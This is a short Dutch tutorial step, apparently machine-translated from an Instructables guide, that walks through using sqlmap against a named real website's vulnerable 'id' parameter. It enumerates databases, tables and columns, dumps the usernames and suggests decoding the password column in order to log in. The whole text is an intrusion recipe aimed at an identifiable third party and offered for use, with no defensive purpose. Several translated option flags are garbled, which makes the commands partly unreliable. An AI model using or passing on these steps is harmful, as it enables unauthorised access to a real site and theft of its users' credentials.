Stap 4: Met behulp van sqlmap om het te kappen
In uw terminal type:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 --dbs
(http://www.angelvestgroup.com/info.php?id=1 is mijn kwetsbare url)
Nu gaat het laden van de databases...
Als dat gebeurt moet u een database selecteren door te typen:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china--tabellen
(angelvest_china is de database die ik gevonden)
Nu gaat het laden van alle informatie die in de database die u hebt geselecteerd.
Nu zult u moeten selecteren van een tabel door te typen:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user--kolom
(db_user is de tabel die ik gevonden)
Nu moet u een kolom selecteren door te typen:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user - C gebruikersnaam--dump
(gebruikersnaam is de naam van de kolom die ik gevonden)
Nu het zal het dumpen van de gegevens in de kolom gebruikersnaam en: je hebt het gehackt! (Op die site is er een kolom met de naam wachtwoorden ook dus je alleen maar hoeft te decoderen de ragout in die kolom en boom! U kunt inloggen.)
Congrats! Je hebt enkel een website met sqlmap gehackt! Als je graag de instructable moet u ook een kijkje op mijn andere instructables nemen! Stay tuned voor meer!